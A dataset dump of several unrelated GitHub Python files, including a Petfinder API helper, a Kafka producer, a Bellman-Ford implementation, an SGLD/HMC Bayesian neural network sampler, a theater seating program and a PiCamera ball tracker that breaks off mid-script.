and cl and gen and si) or\n (ct and b and col and g and si) or (ct and bre and cl and g and si) or\n (ct and bre and col and g and s) or (g and b and cl and cot and si) or\n (g and b and col and ct and si) or (g and bre and cl and ct and si) or\n (g and bre and col and ct and s) or (s and b and cl and cot and gen) or\n (s and b and col and ct and gen) or (s and bre and cl and ct and gen) or\n (s and bre and col and ct and g)): \n fatty_filter[c_id] = info\n if fatty_filter:\n return fatty_filter\n\n\ndef shelter_info(shelter_id):\n \"\"\"Return API response for shelter information using the organization ID \n associated to the cat from search_petfinder, get organization endpoint\"\"\"\n \n token = get_token()\n url = 'https://api.petfinder.com/v2/organizations/' + shelter_id\n headers = {'Authorization': token}\n payload = {'id': shelter_id}\n response = requests.get(url, headers=headers, params=payload)\n data = response.json()\n \n return data\n\n\ndef shelter_data_map(shelter_id):\n \"\"\"Mapping function to extract relevant information from shelter_info\"\"\"\n\n shelter_details = {}\n shelter = shelter_info(shelter_id)\n org = shelter['organization']\n \n shelter_details[org['id']] = {\n 'shelter_id': org['id'],\n 'name': org['name'],\n 'phone': org['phone'],\n 'email': org['email'],\n 'url': org['url'],\n 'location': {'address': org['address']['address1'],\n 'city': org['address']['city'],\n 'state': org['address']['state'],\n 'zipcode': org['address']['postcode'],\n 'country': org['address']['country']}\n }\n\n return shelter_details\n\n\n","repo_name":"atray1/Chonkers","sub_path":"petfinder.py","file_name":"petfinder.py","file_ext":"py","file_size_in_byte":9362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1399645978","text":"n=int(input())\r\nfactorial=1\r\nif n<0:\r\n print(\"Number must be positive\")\r\nelif n==0:\r\n print(\"factorial=1\")\r\nelse:\r\n for a in range(1,n+1):\r\n factorial=factorial*a\r\n\r\nprint(factorial)","repo_name":"Akash5210/Python","sub_path":"factorial_using_for_loop.py","file_name":"factorial_using_for_loop.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4939944222","text":"import string\nimport shutil\nimport os\nimport time\nfrom matplotlib import pyplot as plt\nfrom queue import Queue\nimport threading\n\n# Function to Convert the File to Upper Case\ndef task(filename):\n inputFile = open(f\"./input/{filename}\", \"r\")\n content = inputFile.read()\n outputFile = open(f\"./output/{filename}\", \"w\")\n outputFile.write(content.upper()) \n\n \n# Function to send task to threads\ndef do_stuff(q):\n while not q.empty():\n value = q.get()\n task(value)\n q.task_done()\n\n# Step 1 : Generate a 10 MB Text File \n\nf = open(\"temp.txt\",'w')\n\nalphabets = string.ascii_letters\n\nfor i in range(200000):\n f.writelines(alphabets + '\\n')\n\n# Step 2 : Create 50 Files\nos.mkdir(f'input')\nfor j in range(100):\n shutil.copyfile(src='temp.txt',dst=f'./input/temp{j}.txt')\n\n\n# Step 3 : Convert Given Files to Upper Case and Note Time Taken\ndata = {}\n\nfor t in [j*5 for j in range(1,5)]:\n jobs = Queue()\n os.mkdir('output')\n for elem in os.listdir('input'):\n jobs.put(elem)\n start = time.time()\n for i in range(t):\n worker = threading.Thread(target=do_stuff, args=(jobs,))\n worker.start()\n \n jobs.join()\n end = time.time()\n print(t, end - start)\n data[t] = end - start\n shutil.rmtree('output')\n\n\n# Step 4 : Plot the required Data\nprint(data)\n\nplt.plot(list(data.keys()),list(data.values()))\nplt.xlabel(\"Number of threads\")\nplt.ylabel(\"Time Taken\")\nplt.title(\"Time taken to convert to 500 files to Upper Case\")\nplt.show()","repo_name":"dragonman164/Mini-Projects","sub_path":"Lower Case to Upper (MultiThreading Solution)/mainscript.py","file_name":"mainscript.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33876225758","text":"from django.urls import path\r\n\r\nfrom .views import (\r\n QueryView, SuccessView, TrackingView, Feedback\r\n)\r\n\r\nurlpatterns = [\r\n path('feedback/', Feedback.as_view(), name='feedback'),\r\n path('query/', QueryView.as_view(), name='query'),\r\n path('success/', SuccessView.as_view(), name='querysuccess'),\r\n path('tracker/', TrackingView.as_view(), name='tracking'),\r\n]\r\n","repo_name":"deepak3081996/artisticripples","sub_path":"contact/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43615230918","text":"def bellman_ford(grafo, source):\r\n distancia, ant = dict(), dict()\r\n for j in grafo:\r\n distancia[j], ant[j] = float('inf'), None\r\n distancia[source] = 0\r\n\r\n for _ in range(len(grafo) - 1):\r\n for j in grafo:\r\n for i in grafo[j]:\r\n if distancia[i] > distancia[j] + grafo[j][i]:\r\n distancia[i], ant[i] = distancia[j] + grafo[j][i], j\r\n\r\n for j in grafo:\r\n for i in grafo[j]:\r\n assert distancia[i] <= distancia[j] + grafo[j][i]\r\n\r\n return distancia, ant\r\n \r\nif __name__ == '__main__':\r\n grafo = {\r\n 'a': {'b': -1, 'c': 4},\r\n 'b': {'c': 3, 'd': 2, 'e': 2},\r\n 'c': {},\r\n 'd': {'b': 1, 'c': 5},\r\n 'e': {'d': -3}\r\n }\r\n\r\n distancia, ant = bellman_ford(grafo, source='a')\r\n\r\n print(distancia)\r\n \r\n grafo = {\r\n 'a': {'c': 3},\r\n 'b': {'a': 2},\r\n 'c': {'b': 7, 'd': 1},\r\n 'd': {'a': 6},\r\n }\r\n \r\n distancia, ant = bellman_ford(grafo, source='a')\r\n\r\n print(distancia)","repo_name":"drewneres/IFG","sub_path":"bellman_ford.py","file_name":"bellman_ford.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74191045929","text":"from inspect import _void\nimport json\nfrom multiprocessing.sharedctypes import Value\nfrom time import sleep\nimport logging\nimport random\nimport string\n\nfrom kafka import KafkaProducer\n\ntopic_name = 'test-topic'\n\nproducer = KafkaProducer (\n bootstrap_servers='localhost:9092',\n value_serializer=lambda v: json.dumps(v).encode('utf-8')\n)\n\ndef on_send_success(metadata):\n print('messages sent')\n \ndef on_send_failure(ex):\n print(ex)\n logging.error('[ERROR] Error occured while sending message', exc_info=ex)\n\ndef random_string(len: int) -> str:\n return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(len))\n\ndef run(seconds: int, number_of_messages: int) -> None:\n assert seconds >= 0, 'seconds can\\'t be negative'\n assert number_of_messages > 0, 'number of messages must be greater than 0'\n s = 0\n while s < seconds:\n for i in range(number_of_messages):\n producer.send(topic_name, {\"x\": random_string(8)}).add_callback(on_send_success).add_errback(on_send_failure)\n try:\n producer.flush()\n except:\n print('Error while flushing')\n break\n s += 1\n sleep(1)\n\nif __name__ == '__main__':\n run(2, 1)\n producer.close()\n \n","repo_name":"Backss4/apache-kafka-test","sub_path":"src/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23241499165","text":"# 给定二叉树的根节点 root ,返回所有左叶子之和。\n# Definition for a 7.binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n# 左子树和右子树分别递归\nclass Solution:\n def sumOfLeftLeaves(self, root: Optional[TreeNode]) -> int:\n if not root:\n return 0\n leftSum = self.sumOfLeftLeaves(root.left)\n rightSum = self.sumOfLeftLeaves(root.right)\n\n currentVal = 0\n if root.left and not root.left.left and not root.left.right:\n currentVal = root.left.val\n return leftSum + rightSum + currentVal\n\n\"\"\"\n# 二刷\nclass Solution:\n def __init__(self):\n self.total = 0\n\n def sumOfLeftLeaves(self, root: Optional[TreeNode]) -> int:\n def traversal(root):\n if not root:\n return \n if root.left and not root.left.left and not root.left.right:\n self.total += root.left.val\n traversal(root.left)\n traversal(root.right)\n traversal(root)\n return self.total\n\"\"\"","repo_name":"vandeppce/algorithm","sub_path":"7.binary tree/404*SumOfLeftLeaves.py","file_name":"404*SumOfLeftLeaves.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72040215527","text":"from tqdm import tqdm\nimport torch\nfrom .utils import get_cosine_schedule\nfrom . import mcmc\nimport math\nfrom .exp_utils import evaluate_model\n\n\nclass SGLDRunner:\n def __init__(self, model, dataloader, dataloader_test, epochs_per_cycle, warmup_epochs,\n sample_epochs, learning_rate=1e-2, skip=1, metrics_skip=1,\n temperature=1., data_mult=1., momentum=0., sampling_decay=True,\n grad_max=1e6, cycles=1, precond_update=None,\n metrics_saver=None, model_saver=None, reject_samples=False):\n \"\"\"Stochastic Gradient Langevin Dynamics for posterior sampling.\n\n On calling `run`, this class runs SGLD for `cycles` sampling cycles. In\n each cycle, there are 3 phases: descent, warmup and sampling. The cycle\n lasts for `epochs_per_cycle` epochs in total, and the warmup and\n sampling phases last for `warmup_epochs` and `sample_epochs` epochs\n respectively.\n\n The descent phase performs regular gradient descent with momentum, i.e.\n SGLD with temperature=0. The warmup phase raises the temperature to 1.\n During the sample phase, samples get stored.\n\n The learning rate keep decreasing all throughout the cycle following a\n cosine function, from learning_rate=1 at the beginning to\n learning_rate=0 at the end.\n\n The preconditioner gets updated every `precond_update` epochs,\n regardless of the phase in the cycle.\n\n Args:\n model (torch.Module, PriorMixin): BNN model to sample from\n num_data (int): Number of datapoints in training sest\n warmup_epochs (int): Number of epochs per cycle for warming up the Markov chain, at the beginning.\n sample_epochs (int): Number of epochs per cycle where the samples are kept, at the end.\n\n learning_rate (float): Initial learning rate\n skip (int): Number of samples to skip between saved samples during the sampling phase. Sometimes called \"thinning\".\n metrics_skip (int): Number of samples to skip between saved metrics of the sampler\n temperature (float): Temperature for tempering the posterior\n data_mult (float): Effective replication of each datapoint (which is the usual approach to tempering in VI).\n momentum (float): Momentum decay parameter for SGLD\n sampling_decay (bool): Flag to control whether the learning rate should decay during sampling\n grad_max (float): maximum absolute magnitude of an element of the gradient\n cycles (int): Number of warmup and sampling cycles to perform\n precond_update (int): Number of steps after which the preconditioner should be updated. None disables the preconditioner.\n metrics_saver : HDF5Metrics to log metric with a certain name and value\n \"\"\"\n self.model = model\n self.dataloader = dataloader\n self.dataloader_test = dataloader_test\n\n assert warmup_epochs >= 0\n assert sample_epochs >= 0\n assert epochs_per_cycle >= warmup_epochs + sample_epochs\n self.epochs_per_cycle = epochs_per_cycle\n self.descent_epochs = epochs_per_cycle - warmup_epochs - sample_epochs\n self.warmup_epochs = warmup_epochs\n self.sample_epochs = sample_epochs\n\n self.skip = skip\n self.metrics_skip = metrics_skip\n # num_samples (int): Number of recorded per cycle\n self.num_samples = sample_epochs // skip\n assert sample_epochs % skip == 0\n\n self.learning_rate = learning_rate\n self.temperature = temperature\n self.eff_num_data = len(dataloader.dataset) * data_mult\n self.momentum = momentum\n self.sampling_decay = sampling_decay\n self.grad_max = grad_max\n self.cycles = cycles\n self.precond_update = precond_update\n self.metrics_saver = metrics_saver\n self.model_saver = model_saver\n if model_saver is None:\n self._samples = {\n name: torch.zeros(torch.Size([self.num_samples*cycles])+p_or_b.shape, dtype=p_or_b.dtype)\n for name, p_or_b in model.state_dict().items()}\n self._samples[\"steps\"] = torch.zeros(torch.Size([self.num_samples*cycles]), dtype=torch.int64)\n\n self.param_names, self._params = zip(*model.named_parameters())\n self.reject_samples = reject_samples\n\n def _make_optimizer(self, params):\n assert self.reject_samples is False, \"SGLD cannot reject samples\"\n return mcmc.SGLD(\n params=params,\n lr=self.learning_rate, num_data=self.eff_num_data,\n momentum=self.momentum, temperature=self.temperature)\n\n def _make_scheduler(self, optimizer):\n if self.sampling_decay is True or self.sampling_decay == \"cosine\":\n schedule = get_cosine_schedule(\n len(self.dataloader) * self.epochs_per_cycle)\n return torch.optim.lr_scheduler.LambdaLR(\n optimizer=optimizer, lr_lambda=schedule)\n elif self.sampling_decay is False or self.sampling_decay == \"stairs\":\n return torch.optim.lr_scheduler.StepLR(\n optimizer, 150*len(self.dataloader), gamma=0.1)\n elif self.sampling_decay == \"flat\":\n # No-op scheduler\n return torch.optim.lr_scheduler.StepLR(optimizer, 2**30, gamma=1.0)\n raise ValueError(f\"self.sampling_decay={self.sampling_decay}\")\n\n def run(self, progressbar=False):\n \"\"\"\n Runs the sampling on the model.\n\n Args:\n x (torch.tensor): Training input data\n y (torch.tensor): Training labels\n progressbar (bool): Flag that controls whether a progressbar is printed\n \"\"\"\n self.optimizer = self._make_optimizer(self._params)\n self.optimizer.sample_momentum()\n self.scheduler = self._make_scheduler(self.optimizer)\n\n self.metrics_saver.add_scalar(\"test/log_prob\", math.nan, step=-1)\n self.metrics_saver.add_scalar(\"test/acc\", math.nan, step=-1)\n\n def _is_sampling_epoch(_epoch):\n _epoch = _epoch % self.epochs_per_cycle\n sampling_epoch = _epoch - (self.descent_epochs + self.warmup_epochs)\n return (0 <= sampling_epoch) and (sampling_epoch % self.skip == 0)\n\n step = -1 # used for `self.metrics_saver.add_scalar`, must start at 0 and never reset\n postfix = {}\n for cycle in range(self.cycles):\n if progressbar:\n epochs = tqdm(range(self.epochs_per_cycle), position=0,\n leave=True, desc=f\"Cycle {cycle}, Sampling\", mininterval=2.0)\n else:\n epochs = range(self.epochs_per_cycle)\n\n for epoch in epochs:\n for g in self.optimizer.param_groups:\n g['temperature'] = 0. if epoch < self.descent_epochs else self.temperature\n\n for i, (x, y) in enumerate(self.dataloader):\n step += 1\n store_metrics = (\n i == 0 # The start of an epoch\n or step % self.metrics_skip == 0)\n initial_step = (\n step == 0 # The very first step\n or\n # This is the first step after a sampling epoch\n (i == 0 and _is_sampling_epoch(epoch-1)))\n\n loss, acc, delta_energy = self.step(\n step, x.to(self._params[0].device).detach(), y.to(self._params[0].device).detach(),\n store_metrics=store_metrics,\n initial_step=initial_step)\n\n if progressbar and store_metrics:\n postfix[\"train/loss\"] = loss.item()\n postfix[\"train/acc\"] = acc.item()\n if delta_energy is not None:\n postfix[\"Δₑ\"] = delta_energy\n epochs.set_postfix(postfix, refresh=False)\n\n if self.precond_update is not None and epoch % self.precond_update == 0:\n self.optimizer.update_preconditioner()\n\n state_dict = self.model.state_dict()\n if _is_sampling_epoch(epoch):\n self._save_sample(state_dict, cycle, epoch, step)\n results = self._evaluate_model(state_dict, step)\n if progressbar:\n postfix.update(results)\n epochs.set_postfix(postfix, refresh=False)\n\n # Important to put here because no new metrics are added\n # Write metrics to disk every 30 seconds\n self.metrics_saver.flush(every_s=10)\n\n # Save metrics for the last sample\n (x, y) = next(iter(self.dataloader))\n self.step(step+1,\n x.to(self._params[0].device),\n y.to(self._params[0].device),\n store_metrics=True, initial_step=_is_sampling_epoch(-1))\n\n def _save_sample(self, state_dict, cycle, epoch, step):\n # TODO: refactor this into two `model_saver` classes\n sampling_epoch = epoch - (self.descent_epochs + self.warmup_epochs)\n if self.model_saver is None:\n for name, param in state_dict.items():\n self._samples[name][(self.num_samples*cycle)+(sampling_epoch//self.skip)] = param\n else:\n self.model_saver.add_state_dict(state_dict, step)\n self.model_saver.flush()\n\n def _evaluate_model(self, state_dict, step):\n if len(self.dataloader_test) == 0:\n return {}\n self.model.eval()\n state_dict = {k: v.unsqueeze(0) for k, v in state_dict.items()}\n results = evaluate_model(\n self.model, self.dataloader_test, state_dict,\n likelihood_eval=True, accuracy_eval=True, calibration_eval=False)\n self.model.train()\n\n results = {\"test/loss\": -results[\"lp_last\"],\n \"test/acc\": results[\"acc_last\"]}\n for k, v in results.items():\n self.metrics_saver.add_scalar(k, v, step)\n return results\n\n def _model_potential_and_grad(self, x, y):\n self.optimizer.zero_grad()\n loss, log_prior, potential, accs_batch, _ = self.model.split_potential_and_acc(x, y, self.eff_num_data)\n potential.backward()\n for p in self.optimizer.param_groups[0][\"params\"]:\n p.grad.clamp_(min=-self.grad_max, max=self.grad_max)\n if torch.isnan(potential).item():\n raise ValueError(\"Potential is NaN\")\n return loss, log_prior, potential, accs_batch.mean()\n\n def step(self, i, x, y, store_metrics, lr_decay=True, initial_step=False):\n \"\"\"\n Perform one step of SGLD on the model.\n\n Args:\n x (torch.Tensor): Training input data\n y (torch.Tensor): Training labels\n lr_decay (bool): Flag that controls whether the learning rate should decay after this step\n\n Returns:\n loss (float): The current loss of the model for x and y\n \"\"\"\n loss, log_prior, potential, acc = self._model_potential_and_grad(x, y)\n self.optimizer.step(calc_metrics=store_metrics)\n\n lr = self.optimizer.param_groups[0][\"lr\"]\n if lr_decay:\n self.scheduler.step()\n\n if store_metrics:\n # The metrics are valid for the previous step.\n self.store_metrics(i=i-1, loss=loss.item(), log_prior=log_prior.item(),\n potential=potential.item(), acc=acc.item(), lr=lr,\n corresponds_to_sample=initial_step)\n return loss, acc, None\n\n def get_samples(self):\n \"\"\"\n Returns the acquired SGLD samples from the last run.\n\n Returns:\n samples (dict): Dictionary of torch.tensors with num_samples*cycles samples for each parameter of the model\n \"\"\"\n if self.model_saver is None:\n return {k: v for (k, v) in self._samples.items() if k != \"steps\"}\n return self.model_saver.load_samples(keep_steps=False)\n\n def store_metrics(self, i, loss, log_prior, potential, acc, lr,\n corresponds_to_sample: bool,\n delta_energy=None, total_energy=None, rejected=None):\n est_temperature_all = 0.\n est_config_temp_all = 0.\n all_numel = 0\n add_scalar = self.metrics_saver.add_scalar\n for n, p in zip(self.param_names, self.optimizer.param_groups[0][\"params\"]):\n state = self.optimizer.state[p]\n add_scalar(\"preconditioner/\"+n, state[\"preconditioner\"], i)\n add_scalar(\"est_temperature/\"+n, state[\"est_temperature\"], i)\n add_scalar(\"est_config_temp/\"+n, state[\"est_config_temp\"], i)\n\n est_temperature_all += state[\"est_temperature\"] * p.numel()\n est_config_temp_all += state[\"est_config_temp\"] * p.numel()\n all_numel += p.numel()\n add_scalar(\"est_temperature/all\", est_temperature_all / all_numel, i)\n add_scalar(\"est_config_temp/all\", est_config_temp_all / all_numel, i)\n\n temperature = self.optimizer.param_groups[0][\"temperature\"]\n add_scalar(\"temperature\", temperature, i)\n add_scalar(\"loss\", loss, i)\n add_scalar(\"acc\", acc, i)\n add_scalar(\"log_prior\", log_prior, i)\n add_scalar(\"potential\", potential, i)\n add_scalar(\"lr\", lr, i)\n add_scalar(\"acceptance/is_sample\", int(corresponds_to_sample), i)\n\n if delta_energy is not None:\n add_scalar(\"delta_energy\", delta_energy, i)\n add_scalar(\"total_energy\", total_energy, i)\n if rejected is not None:\n add_scalar(\"acceptance/rejected\", int(rejected), i)\n\n\nclass VerletSGLDRunner(SGLDRunner):\n def _make_optimizer(self, params):\n return mcmc.VerletSGLD(\n params=params,\n lr=self.learning_rate, num_data=self.eff_num_data,\n momentum=self.momentum, temperature=self.temperature)\n\n def step(self, i, x, y, store_metrics, lr_decay=True, initial_step=False):\n loss, log_prior, potential, acc = self._model_potential_and_grad(x, y)\n lr = self.optimizer.param_groups[0][\"lr\"]\n\n rejected = None\n delta_energy = None\n if i == 0:\n # The very first step\n if isinstance(self.optimizer, mcmc.HMC):\n # momentum should be sampled already, but it does not hurt to\n # sample again.\n self.optimizer.sample_momentum()\n self.optimizer.initial_step(\n calc_metrics=True, save_state=self.reject_samples)\n if self.reject_samples:\n rejected = False # the first sample is what we have.\n elif initial_step:\n # Calculate metrics using the possible sample's parameter (which is\n # not modified), its gradient, and the new momentum as updated by\n # `final_step`.\n self.optimizer.final_step(calc_metrics=True)\n delta_energy = self.optimizer.delta_energy(self._initial_potential, potential)\n if self.reject_samples:\n rejected, _ = self.optimizer.maybe_reject(delta_energy)\n\n # The first step of an epoch, but not the very first\n if isinstance(self.optimizer, mcmc.HMC):\n self.optimizer.sample_momentum()\n self.optimizer.initial_step(\n calc_metrics=False, save_state=self.reject_samples)\n else:\n # Any intermediate step\n self.optimizer.step(calc_metrics=store_metrics)\n\n if i == 0:\n # Very first step\n store_metrics = True\n total_energy = delta_energy = self.optimizer.delta_energy(0., 0.)\n self._initial_potential = potential.item()\n self._total_energy = 0.\n elif initial_step:\n # First step of an epoch\n store_metrics = True\n self._initial_potential = potential.item()\n self._total_energy += delta_energy\n total_energy = self._total_energy\n else:\n # Any step\n if store_metrics:\n delta_energy = self.optimizer.delta_energy(self._initial_potential, loss)\n total_energy = self._total_energy + delta_energy\n\n if store_metrics:\n # The metrics are valid for the previous step.\n self.store_metrics(i=i-1, loss=loss.item(), log_prior=log_prior.item(),\n potential=potential.item(), acc=acc.item(), lr=lr,\n delta_energy=delta_energy,\n total_energy=total_energy, rejected=rejected,\n corresponds_to_sample=initial_step)\n if lr_decay:\n self.scheduler.step()\n return loss, acc, delta_energy\n\nclass HMCRunner(VerletSGLDRunner):\n def _make_optimizer(self, params):\n assert self.temperature == 1.0, \"HMC only implemented for temperature=1.\"\n assert self.momentum == 1.0, \"HMC only works with momentum=1.\"\n assert self.descent_epochs == 0, \"HMC not implemented for descent epochs with temp=0.\"\n return mcmc.HMC(\n params=params,\n lr=self.learning_rate, num_data=self.eff_num_data)\n","repo_name":"ratschlab/bnn_priors","sub_path":"bnn_priors/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":17365,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"53"} +{"seq_id":"15476534342","text":"#Kevin Andrade\n#SE126.02\n#February 28, 2022\n#Lab 8\n\n\n#========== FUNCTIONS ==========\ndef chart(num,a,b,c):\n print(\" A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4\\n\")\n for i in range (0,5):\n print(\"row {0:2}\".format(i+1),end=\" \")\n for j in range (0,num):\n print(a[i][j],end=\" \")\n print()\n \n\n for i in range (0,5):\n print(\"row {0:2}\".format(i+6),end=\" \")\n for j in range (0,num):\n print(b[i][j],end=\" \")\n print()\n\n for i in range (0,5):\n print(\"row {0:2}\".format(i+11),end=\" \")\n for j in range (0,num):\n print(c[i][j],end=\" \")\n print()\n \n\ndef numrow():\n num = int(input(\"Enter desired row number: \"))\n while num > 15 or num < 1:\n print(\"*ERROR* Invalid Selection\")\n num = int(input(\"Enter desired row number: \"))\n\n return num\n\n\n\ndef numcol():\n num = input(\"Enter desired seat letter: \").lower()\n if (num == \"1\" or num == \"2\" or num == \"3\" or num == \"4\"):\n new = ord(num) - 22\n else:\n new = ord(num) - 96\n return new\n\n\n\ndef amount():\n num = int(input(\"How Many Tickets would you like to purchase?: \"))\n return num\n\n\n\ndef tixprice(num):\n if num > 0 and num <= 5:\n money = 200\n elif num > 5 and num <= 10:\n money = 175\n elif num > 10 and num <= 15:\n money = 150\n\n return money\n\n\n\ndef update(num,rownum,colnum,a,b,c):\n\n avail = \"false\"\n while avail == \"false\":\n \n if(rownum > 0 and rownum <= 5):\n if a[rownum-1][colnum] == \"*\":\n avail = \"false\"\n print(\"\\nSeat is already taken, please make another seleection!\")\n rownum = numrow()\n colnum = numcol()\n else:\n avail = \"true\"\n a[rownum-1][colnum] = \"*\"\n\n elif(rownum >= 6 and rownum <= 10):\n if b[rownum-6][colnum] == \"*\":\n avail = \"false\"\n print(\"\\nSeat is already taken, please make another seleection!\")\n rownum = numrow()\n colnum = numcol()\n else:\n avail = \"true\"\n b[rownum-6][colnum] = \"*\"\n\n elif(rownum >= 11 and rownum <= 15):\n if c[rownum-11][colnum] == \"*\":\n avail = \"false\"\n print(\"\\nSeat is already taken, please make another seleection!\")\n rownum = numrow()\n colnum = numcol()\n else:\n avail = \"true\"\n c[rownum-11][colnum] = \"*\"\n\n key = input(\"Would you like to see available seats? [Y/N]: \").lower()\n \n while key == \"y\":\n counter = 0\n \n print(\" A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4\\n\")\n for i in range (0,5):\n print(\"row {0:2}\".format(i+1),end=\" \")\n countRow = 0\n for j in range (0,num):\n print(a[i][j],end=\" \")\n if a[i][j] == \"*\":\n countRow += 1 \n counter +=1\n print(\"....{} seats Available\".format(30-countRow))\n \n\n for i in range (0,5):\n print(\"row {0:2}\".format(i+6),end=\" \")\n countRow = 0\n for j in range (0,num):\n print(b[i][j],end=\" \")\n if b[i][j] == \"*\":\n countRow += 1 \n counter += 1\n print(\"....{} seats Available\".format(30-countRow))\n\n for i in range (0,5):\n print(\"row {0:2}\".format(i+11),end=\" \")\n countRow = 0\n for j in range (0,num):\n print(c[i][j],end=\" \")\n if c[i][j] == \"*\":\n countRow += 1 \n counter += 1\n print(\"....{} seats Available\".format(30-countRow))\n\n print(\"\\nThere are {} total seats available!\".format(450-counter))\n\n key = \"n\"\n\n\n#========== Main Code ==========\n\nrow1 = [\"\"]\nrow2 = [\"\"]\nrow3 = [\"\"]\nrow4 = [\"\"]\nrow5 = [\"\"]\nrow6 = [\"\"]\nrow7 = [\"\"]\nrow8 = [\"\"]\nrow9 = [\"\"]\nrow10 = [\"\"]\nrow11 = [\"\"]\nrow12 = [\"\"]\nrow13 = [\"\"]\nrow14 = [\"\"]\nrow15 = [\"\"]\n\n\nrows = 15\nseats = 31\nfor x in range (0,seats):\n row1.append(\"#\")\n row2.append(\"#\")\n row3.append(\"#\")\n row4.append(\"#\")\n row5.append(\"#\")\n row6.append(\"#\")\n row7.append(\"#\")\n row8.append(\"#\")\n row9.append(\"#\")\n row10.append(\"#\")\n row11.append(\"#\")\n row12.append(\"#\")\n row13.append(\"#\")\n row14.append(\"#\")\n row15.append(\"#\")\n\nsec1 = [row1,row2,row3,row4,row5]\nsec2 = [row6,row7,row8,row9,row10]\nsec3 = [row11,row12,row13,row14,row15]\n#print(sec1)\n#print(sec2)\n#print(sec3)\n\nchart(seats,sec1,sec2,sec3)\nprint(\"\")\nnumtix = amount()\ntotalprice= 0\nfor x in range (0,numtix):\n y = x+1\n print(\"\\nTicket #{}\".format(y))\n inrow = numrow()\n incol = numcol()\n #print(inrow)\n #print(incol)\n price = tixprice(inrow)\n totalprice = totalprice + price\n check = \"y\"\n while check == \"y\":\n check = input(\"Would you like to see your current total? [Y/N] \").lower()\n if check == \"y\":\n print(\"\\nYour total is ${0:.2f}\".format(totalprice))\n check = \"n\"\n update(seats,inrow,incol,sec1,sec2,sec3)\n \n\nprint(\"\\nYour Grandtotal is ${0:.2f}\".format(totalprice))","repo_name":"gordiviris/Interm-Python","sub_path":"Andrade-8.py","file_name":"Andrade-8.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22400804119","text":"from collections import deque\nfrom picamera import PiCamera\nimport cv2\nimport time\nimport argparse\nimport imutils\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\nfrom imutils.video import count_frames\nfrom imutils import paths\nfrom PIL import Image\nimport numpy as np;\n\n#camera video setup\nvs = VideoStream(usePiCamera=True).start()\ntime.sleep(2.0)\n# fps = FPS().start()\nprint(\"STARTING VIDEO FEED\")\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-b\", \"--buffer\", type=int, default=64, help=\"max buffer size\")\nargs = vars(ap.parse_args())\n\n#ORANGE COLOR MASK:\nboundaries = [\n ([7,120,120], [153,255,255])#ORANGE, OpenCV measures HSV from 0-255 range\n #HSV in 0-100 range: [3,30,30], [60,100,100] #OLD: [7,76,76], [153,255,255]\n]\n\n#TRACKED POINTS:\npts=deque(maxlen=args[\"buffer\"])\n\n#frame counter:\nframenumber=0\n\n(dX, dY) = (0,0)\ndirection = \"\"\n\n\n# LOOP CODE\nwhile True: #constant video frame read\n frame = vs.read()\n fps = FPS().start()\n \n #convert to HSV, set HSV boundaries\n hsv=cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n #cycling through boundaries, detecting mask\n for (lower,upper) in boundaries:\n lower = np.array(lower, dtype = \"uint8\")\n upper = np.array(upper, dtype = \"uint8\")\n\n #HSV\n mask = cv2.inRange(hsv,lower,upper)\n output = cv2.bitwise_and(hsv,hsv, mask=mask)\n \n #finding contours\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n center = None\n \n #largest contour, drawing bounding circle\n if len(cnts) > 0:\n #detecting ball and center:\n c=max(cnts, key=cv2.contourArea)\n ((x,y),radius)= cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n if (M[\"m00\"]==0): #to fix the divide by zero error?\n cv2.putText(frame, \"ERROR, no center\", (10,20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,0))\n else:\n center=(int(M[\"m10\"]/M[\"m00\"]),int(M[\"m01\"]/M[\"m00\"]))\n \n #drawing here:\n cv2.circle(frame, (int(x), int(y)), int(radius), (255,0,0), 2) #BOUNDING CIRCLE (blue)\n cv2.circle(frame, center, 5, (0,255,0),-1) #CENTER (green)\n \n diameter=radius*2\n \n #calculate z distance:\n zcoord=(diameter/473)**(1/(-1.07))\n #cv2.putText(frame, str(physicalz), (10,40), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,0,0))\n \n #calculating u and v coordinates:\n #Photo dimensions: (1920,1080); Center coords: 960,540\n #Video Feed dimensions: (320,240); Center coords: 160,120\n cx=160 #video center x, photo: 960\n cy=120 #video center y, photo: 540\n u=x-cx\n v=y-cy\n v=-v #because reference frame is top left\n \n f=252\n #OLD: f=2714.285714 #focal length in px\n xcoord=(zcoord/f)*u\n ycoord=(zcoord/f)*v\n #convert to cm:\n zcoord=zcoord*(2.54)\n physicalz= \"Z: \" + str(zcoord) + \" m\"\n xcoord=xcoord*2.54\n ycoord=ycoord*2.54\n \n #truncating floats:\n u='%.2f'%(u)\n v='%.2f'%(v)\n 